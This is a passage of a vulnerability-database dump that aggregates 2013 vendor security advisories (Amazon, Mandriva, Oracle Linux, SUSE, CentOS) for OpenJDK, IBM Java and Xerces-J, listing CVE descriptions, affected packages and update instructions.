([CVE-2013-5772 __](<https://access.redhat.com/security/cve/CVE-2013-5772>))\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. ([CVE-2013-5803 __](<https://access.redhat.com/security/cve/CVE-2013-5803>))\n\n \n**Affected Packages:** \n\n\njava-1.6.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.6.0-openjdk_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.6.0-openjdk-debuginfo-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-devel-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-javadoc-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-src-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-demo-1.6.0.0-65.1.11.14.57.amzn1.i686 \n \n src: \n java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.src \n \n x86_64: \n java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-src-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-demo-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-javadoc-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-debuginfo-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-devel-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n \n \n", "modified": "2014-09-16T21:54:00", "published": "2014-09-16T21:54:00", "id": "ALAS-2013-246", "href": "https://alas.aws.amazon.com/ALAS-2013-246.html", "title": "Important: java-1.6.0-openjdk", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:22:46", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. 
([CVE-2013-5782 __](<https://access.redhat.com/security/cve/CVE-2013-5782>))\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5830 __](<https://access.redhat.com/security/cve/CVE-2013-5830>))\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2013-5829 __](<https://access.redhat.com/security/cve/CVE-2013-5829>), [CVE-2013-5814 __](<https://access.redhat.com/security/cve/CVE-2013-5814>), [CVE-2013-5817 __](<https://access.redhat.com/security/cve/CVE-2013-5817>), [CVE-2013-5842 __](<https://access.redhat.com/security/cve/CVE-2013-5842>), [CVE-2013-5850 __](<https://access.redhat.com/security/cve/CVE-2013-5850>), [CVE-2013-5838 __](<https://access.redhat.com/security/cve/CVE-2013-5838>))\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions. ([CVE-2013-5809 __](<https://access.redhat.com/security/cve/CVE-2013-5809>))\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. ([CVE-2013-5802 __](<https://access.redhat.com/security/cve/CVE-2013-5802>))\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. 
([CVE-2013-5825 __](<https://access.redhat.com/security/cve/CVE-2013-5825>), [CVE-2013-4002 __](<https://access.redhat.com/security/cve/CVE-2013-4002>), [CVE-2013-5823 __](<https://access.redhat.com/security/cve/CVE-2013-5823>))\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. ([CVE-2013-3829 __](<https://access.redhat.com/security/cve/CVE-2013-3829>), [CVE-2013-5840 __](<https://access.redhat.com/security/cve/CVE-2013-5840>), [CVE-2013-5774 __](<https://access.redhat.com/security/cve/CVE-2013-5774>), [CVE-2013-5783 __](<https://access.redhat.com/security/cve/CVE-2013-5783>), [CVE-2013-5820 __](<https://access.redhat.com/security/cve/CVE-2013-5820>), [CVE-2013-5851 __](<https://access.redhat.com/security/cve/CVE-2013-5851>), [CVE-2013-5800 __](<https://access.redhat.com/security/cve/CVE-2013-5800>), [CVE-2013-5849 __](<https://access.redhat.com/security/cve/CVE-2013-5849>), [CVE-2013-5790 __](<https://access.redhat.com/security/cve/CVE-2013-5790>), [CVE-2013-5784 __](<https://access.redhat.com/security/cve/CVE-2013-5784>))\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. ([CVE-2013-5778 __](<https://access.redhat.com/security/cve/CVE-2013-5778>))\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks. 
([CVE-2013-5804 __](<https://access.redhat.com/security/cve/CVE-2013-5804>), [CVE-2013-5797 __](<https://access.redhat.com/security/cve/CVE-2013-5797>))\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. ([CVE-2013-5780 __](<https://access.redhat.com/security/cve/CVE-2013-5780>))\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. ([CVE-2013-5772 __](<https://access.redhat.com/security/cve/CVE-2013-5772>))\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. ([CVE-2013-5803 __](<https://access.redhat.com/security/cve/CVE-2013-5803>))\n\n \n**Affected Packages:** \n\n\njava-1.7.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.7.0-openjdk_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-src-1.7.0.45-2.4.3.2.32.amzn1.i686 \n \n noarch: \n java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.2.32.amzn1.noarch \n \n src: \n java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.src \n \n x86_64: \n java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-src-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n \n \n", "modified": 
"2014-09-16T21:45:00", "published": "2014-09-16T21:45:00", "id": "ALAS-2013-235", "href": "https://alas.aws.amazon.com/ALAS-2013-235.html", "title": "Critical: java-1.7.0-openjdk", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "description": "resources exhaustion on XML parsing.", "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:VULN:14011", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14011", "title": "xerces-j DoS", "type": "securityvulns", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:193\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : xerces-j2\r\n Date : October 1, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A resource consumption issue was found in the way Xerces-J handled\r\n XML declarations. 
A remote attacker could use an XML document with\r\n a specially crafted declaration using a long pseudo-attribute name\r\n that, when parsed by an application using Xerces-J, would cause that\r\n application to use an excessive amount of CPU (CVE-2013-4002).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002\r\n https://rhn.redhat.com/errata/RHSA-2014-1319.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 52bdd3a413234b883bc99ac480d00ce4 mbs1/x86_64/xerces-j2-2.11.0-7.1.mbs1.noarch.rpm\r\n de543be77e3afa9c7cbedbc3d50881ff mbs1/x86_64/xerces-j2-demo-2.11.0-7.1.mbs1.noarch.rpm\r\n d44aa2df7aa370ef800bfe8699bce684 mbs1/x86_64/xerces-j2-javadoc-2.11.0-7.1.mbs1.noarch.rpm \r\n 4d9941ee6465984e781c4b668b90e438 mbs1/SRPMS/xerces-j2-2.11.0-7.1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFUK/h1mqjQ0CJFipgRAlppAKDaHlxOs5j+pd0FCV38TgV2FI9c0ACgnkYR\r\n/5rZeKz0+6ZhwoqEFnrGSdM=\r\n=MTih\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31186", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31186", "title": "[ MDVSA-2014:193 ] xerces-j2", "type": "securityvulns", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "unix", "description": "[2.11.0-17]\n- Fix XML parsing bug (JAXP, 8017298)\n- Resolves: CVE-2013-4002", "modified": "2014-09-29T00:00:00", "published": "2014-09-29T00:00:00", "id": "ELSA-2014-1319", "href": "http://linux.oracle.com/errata/ELSA-2014-1319.html", "title": "xerces-j2 security update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:35", "bulletinFamily": "unix", "description": "[1:1.6.0.0-1.68.1.11.14]\n- updated to icedtea6-1.11.14.tar.gz\n- added and applied 1.11.14-fixes.patch, patch10 to fix build issues\n- adapted patch8 java-1.6.0-openjdk-timezone-id.patch\n- Resolves: rhbz#1017618\n[1:1.6.0.1-1.67.1.13.0]\n- reverted previous update\n- Resolves: rhbz#1017618\n[1:1.6.0.1-1.66.1.13.0]\n- updated to icedtea 
1.13\n- updated to openjdk-6-src-b28-04_oct_2013\n- added --disable-lcms2 configure switch to fix tck\n- removed upstreamed patch7,java-1.6.0-openjdk-jstack.patch\n- added patch7 1.13_fixes.patch to fix 1.13 build issues\n- adapted patch0 java-1.6.0-openjdk-optflags.patch\n- adapted patch3 java-1.6.0-openjdk-java-access-bridge-security.patch\n- adapted patch8 java-1.6.0-openjdk-timezone-id.patch\n- removed useless runtests parts\n- included also java.security.old files\n- Resolves: rhbz#1017618", "modified": "2013-11-05T00:00:00", "published": "2013-11-05T00:00:00", "id": "ELSA-2013-1505", "href": "http://linux.oracle.com/errata/ELSA-2013-1505.html", "title": "java-1.6.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "unix", "description": "[1.7.0.45-2.4.3.1.0.1.el5_10]\n- Add oracle-enterprise.patch\n- Fix DISTRO_NAME to 'Enterprise Linux'\n[1.7.0.45-2.4.3.1.el5]\n- Updated to icedtea 2.4.3\n- Resolves: rhbz#1017623\n[1.7.0.45-2.4.3.0.el5]\n- fixed and updated tapset\n- removed bootstrap\n- source 11 redeclared to 1111\n- added source12: TestCryptoLevel.java\n- removed upstreamed patch103 java-1.7.0-openjdk-arm-fixes.patch\n- removed unnecessary patch112 java-1.7.0-openjdk-doNotUseDisabledEcc.patch\n- added patch120: java-1.7.0-openjdk-freetype-check-fix.patch\n- fixed nss\n- cleaned sources\n- Resolves: rhbz#1017623\n[1.7.0.25-2.4.1.4.el5]\n- updated to icedtea 2.4.1\n- improved handling of patch111 - nss-config-2.patch\n- backported uniquesuffix from 6.5\n- Resolves: rhbz#978421", "modified": "2013-10-21T00:00:00", "published": "2013-10-21T00:00:00", "id": "ELSA-2013-1447", "href": "http://linux.oracle.com/errata/ELSA-2013-1447.html", "title": "java-1.7.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:18:18", "bulletinFamily": "unix", 
"description": "IBM Java 5 SR16-FP4 has been released which fixes lots of\n bugs and security issues.\n\n More information can be found on:\n http://www.ibm.com/developerworks/java/jdk/alerts/\n\n The following CVEs are fixed:\n CVE-2013-4041, CVE-2013-5375, CVE-2013-5372, CVE-2013-5843,\n CVE-2013-5830, CVE-2013-5829, CVE-2013-5842, CVE-2013-5782,\n CVE-2013-5817, CVE-2013-5809, CVE-2013-5814, CVE-2013-5802,\n CVE-2013-5804, CVE-2013-5783, CVE-2013-3829, CVE-2013-4002,\n CVE-2013-5774, CVE-2013-5825, CVE-2013-5840, CVE-2013-5801,\n CVE-2013-5778, CVE-2013-5849, CVE-2013-5790, CVE-2013-5780,\n CVE-2013-5797, CVE-2013-5803\n\n\n", "modified": "2013-11-14T16:04:15", "published": "2013-11-14T16:04:15", "id": "SUSE-SU-2013:1669-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00012.html", "title": "Security update for IBM Java 5 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:14:44", "bulletinFamily": "unix", "description": "IBM Java 1.5.0 was updated to SR16-FP3 to fix bugs and\n security issues:\n\n CVE-2013-3009, CVE-2013-3011, CVE-2013-3012, CVE-2013-4002,\n CVE-2013-2469, CVE-2013-2465, CVE-2013-2464, CVE-2013-2463,\n CVE-2013-2473, CVE-2013-2472, CVE-2013-2471, CVE-2013-2470,\n CVE-2013-2459, CVE-2013-3743, CVE-2013-2448, CVE-2013-2454,\n CVE-2013-2456, CVE-2013-2457, CVE-2013-2455, CVE-2013-2443,\n CVE-2013-2447, CVE-2013-2444, CVE-2013-2452, CVE-2013-2446,\n CVE-2013-2450, CVE-2013-1571, CVE-2013-1500\n\n Please see also\n http://www.ibm.com/developerworks/java/jdk/alerts/\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n\n\n", "modified": "2013-08-02T23:04:12", "published": "2013-08-02T23:04:12", "id": "SUSE-SU-2013:1293-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00000.html", "type": "suse", "title": "Security update for IBMJava5 JRE and IBMJava5 SDK (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:43:37", "bulletinFamily": "unix", "description": "IBM Java 1.5.0 has been updated to SR16-FP3 to fix bugs and\n security issues.\n\n Please see also\n http://www.ibm.com/developerworks/java/jdk/alerts/\n\n Also the following bug has been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "modified": "2013-07-27T17:04:14", "published": "2013-07-27T17:04:14", "id": "SUSE-SU-2013:1263-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00029.html", "type": "suse", "title": "Security update for java-1_5_0-ibm (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:27:55", "bulletinFamily": "unix", "description": "IBM Java 1.5.0 was updated to SR16-FP3 to fix bugs and\n security issues:\n\n CVE-2013-3009, CVE-2013-3011, CVE-2013-3012, CVE-2013-4002,\n CVE-2013-2469, CVE-2013-2465, CVE-2013-2464,\n CVE-2013-2463, CVE-2013-2473, CVE-2013-2472,\n CVE-2013-2471, CVE-2013-2470, CVE-2013-2459, 
CVE-2013-3743,\n CVE-2013-2448, CVE-2013-2454, CVE-2013-2456,\n CVE-2013-2457, CVE-2013-2455, CVE-2013-2443,\n CVE-2013-2447, CVE-2013-2444, CVE-2013-2452, CVE-2013-2446,\n CVE-2013-2450, CVE-2013-1571, CVE-2013-1500\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n\n Additionally, the following bugs have been fixed: - Add\n Europe/Busingen to tzmappings (bnc#817062) - Mark files in\n jre/bin and bin/ as executable (bnc#823034).\n\n Security Issues:\n\n * CVE-2013-3009\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3009\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3009</a>\n >\n * CVE-2013-3011\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3011\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3011</a>\n >\n * CVE-2013-3012\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3012\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3012</a>\n >\n * CVE-2013-2469\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469</a>\n >\n * CVE-2013-4002\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002</a>\n >\n * CVE-2013-2465\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465</a>\n >\n * CVE-2013-2464\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2464\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2464</a>\n >\n * CVE-2013-2463\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463</a>\n >\n * 
CVE-2013-2473\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473>\n * CVE-2013-2472\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472>\n * CVE-2013-2471\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471>\n * CVE-2013-2470\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470>\n * CVE-2013-2459\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459>\n * CVE-2013-3743\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3743>\n * CVE-2013-2448\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448>\n * CVE-2013-2454\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2454>\n * CVE-2013-2457\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457>\n * CVE-2013-2456\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456>\n * CVE-2013-2455\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455>\n * CVE-2013-2443\n 
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443>\n * CVE-2013-2444\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444>\n * CVE-2013-2447\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447>\n * CVE-2013-2452\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452>\n * CVE-2013-2446\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446>\n * CVE-2013-2450\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450>\n * CVE-2013-1571\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571>\n * CVE-2013-1500\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500>\n\n\n", "modified": "2013-07-30T17:04:11", "published": "2013-07-30T17:04:11", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00032.html", "id": "SUSE-SU-2013:1263-2", "title": "Security update for java-1_5_0-ibm (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:36", "bulletinFamily": "unix", "description": "IBM Java 1.6.0 has been updated to SR14 to fix bugs and\n security issues.\n\n Please see also\n 
http://www.ibm.com/developerworks/java/jdk/alerts/\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "modified": "2013-07-27T17:04:18", "published": "2013-07-27T17:04:18", "id": "SUSE-SU-2013:1255-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00030.html", "title": "Security update for java-1_6_0-ibm (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:50", "bulletinFamily": "unix", "description": "IBM Java 1.6.0 has been updated to SR14 to fix bugs and\n security issues.\n\n Please see also\n http://www.ibm.com/developerworks/java/jdk/alerts/\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n * check if installed qa_filelist is not empty\n (bnc#831936)\n", "modified": "2013-08-06T23:04:12", "published": "2013-08-06T23:04:12", "id": "SUSE-SU-2013:1305-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00003.html", "title": "Security update for IBM Java 1.6.0 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:59:55", "bulletinFamily": "unix", "description": "IBM Java 1.6.0 has been updated to SR14 to fix bugs and\n security issues.\n\n Please see also\n 
http://www.ibm.com/developerworks/java/jdk/alerts/\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "modified": "2013-07-25T20:04:13", "published": "2013-07-25T20:04:13", "id": "SUSE-SU-2013:1255-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00026.html", "type": "suse", "title": "Security update for java-1_6_0-ibm (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:43:04", "bulletinFamily": "unix", "description": "IBM Java 1.7.0 has been updated to SR5 to fix bugs and\n security issues.\n\n Please see also\n http://www.ibm.com/developerworks/java/jdk/alerts/\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "modified": "2013-07-25T20:04:17", "published": "2013-07-25T20:04:17", "id": "SUSE-SU-2013:1256-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00027.html", "type": "suse", "title": "Security update for java-1_7_0-ibm (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:41", "bulletinFamily": "unix", "description": "IBM Java 1.6.0 was updated to SR14 to fix bugs and security\n issues.\n\n Please see also\n 
http://www.ibm.com/developerworks/java/jdk/alerts/\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "modified": "2013-07-30T19:04:11", "published": "2013-07-30T19:04:11", "id": "SUSE-SU-2013:1255-3", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00033.html", "type": "suse", "title": "Security update for IBM Java 1.6.0 (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:39:29", "bulletinFamily": "unix", "description": "This release updates our OpenJDK 7 support in the 2.4.x\n series with a number of security fixes and synchronises it\n with upstream development. 
The security issues fixed (a\n long list) can be found in the following link:\n\n http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-October/025087.html\n", "modified": "2013-11-13T15:04:17", "published": "2013-11-13T15:04:17", "id": "SUSE-SU-2013:1666-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00010.html", "title": "Security update for OpenJDK 7 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-05-29T18:35:43", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:1505\n\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. 
An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocess XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790,\nCVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the 